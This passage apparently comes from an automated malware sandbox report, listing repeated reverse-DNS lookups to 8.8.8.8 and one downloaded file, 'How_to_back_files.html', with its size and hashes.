                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                146.78.124.51.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                146.78.124.51.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                171.39.242.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                171.39.242.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                a88-221-135-217deploystaticakamaitechnologiescom
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                175.178.17.96.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                175.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                175.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                a96-17-178-175deploystaticakamaitechnologiescom
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                21.236.111.52.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                21.236.111.52.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                21.236.111.52.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                21.236.111.52.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                a96-17-178-186deploystaticakamaitechnologiescom
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                55.36.223.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                55.36.223.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                5.181.190.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                5.181.190.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                18.173.189.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                18.173.189.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                158.240.127.40.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                158.240.127.40.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • 20.231.121.79:80
                                                                                                                                156 B
                                                                                                                                3
                                                                                                                              • 8.8.8.8:53
                                                                                                                                21.53.126.40.in-addr.arpa
                                                                                                                                dns
                                                                                                                                71 B
                                                                                                                                157 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                21.53.126.40.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                206.178.17.96.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                137 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                206.178.17.96.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                                dns
                                                                                                                                73 B
                                                                                                                                144 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                95.221.229.192.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                216 B
                                                                                                                                158 B
                                                                                                                                3
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                241.154.82.20.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                241.154.82.20.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                241.154.82.20.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                41.110.16.96.in-addr.arpa
                                                                                                                                dns
                                                                                                                                71 B
                                                                                                                                135 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                41.110.16.96.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                157.123.68.40.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                146 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                157.123.68.40.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                146.78.124.51.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                158 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                146.78.124.51.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                171.39.242.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                158 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                171.39.242.20.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                217.135.221.88.in-addr.arpa
                                                                                                                                dns
                                                                                                                                146 B
                                                                                                                                139 B
                                                                                                                                2
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                217.135.221.88.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                217.135.221.88.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                175.178.17.96.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                137 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                175.178.17.96.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                21.236.111.52.in-addr.arpa
                                                                                                                                dns
                                                                                                                                144 B
                                                                                                                                158 B
                                                                                                                                2
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                21.236.111.52.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                21.236.111.52.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                186.178.17.96.in-addr.arpa
                                                                                                                                dns
                                                                                                                                144 B
                                                                                                                                137 B
                                                                                                                                2
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                186.178.17.96.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                186.178.17.96.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                55.36.223.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                71 B
                                                                                                                                157 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                55.36.223.20.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                5.181.190.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                71 B
                                                                                                                                157 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                5.181.190.20.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                2.136.104.51.in-addr.arpa
                                                                                                                                dns
                                                                                                                                71 B
                                                                                                                                157 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                2.136.104.51.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                18.173.189.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                72 B
                                                                                                                                158 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                18.173.189.20.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                158.240.127.40.in-addr.arpa
                                                                                                                                dns
                                                                                                                                73 B
                                                                                                                                147 B
                                                                                                                                1
                                                                                                                                1

                                                                                                                                DNS Request

                                                                                                                                158.240.127.40.in-addr.arpa

                                                                                                                              • 8.8.8.8:53
                                                                                                                                208.194.73.20.in-addr.arpa
                                                                                                                                dns
                                                                                                                                144 B
                                                                                                                                316 B
                                                                                                                                2
                                                                                                                                2

                                                                                                                                DNS Request

                                                                                                                                208.194.73.20.in-addr.arpa

                                                                                                                                DNS Request

                                                                                                                                208.194.73.20.in-addr.arpa

                                                                                                                              MITRE ATT&CK Enterprise v15

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

                                                                                                                              • C:\odt\How_to_back_files.html

                                                                                                                                Filesize

                                                                                                                                4KB

                                                                                                                                MD5

                                                                                                                                24a9adc4a8f7dc610cf2a997c9b02eb2

                                                                                                                                SHA1

                                                                                                                                a1ab40cebbbf8cef8f6274bda5a2b382fb585204

                                                                                                                                SHA256

                                                                                                                                3e3829b08948b257f42a75bd6b3c86dcbc1ad41ed36a8520caf60b99bc03531d

                                                                                                                                SHA512

                                                                                                                                002db1b95eab0c79f75bc480945deb573174076af73d9412b57f2a3eeade1e4c3cdc159e5fd4abc66fad39242d364bde975e73d883d6aaa02f0ddf9037879079

                                                                                                                              We care about your privacy.

                                                                                                                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.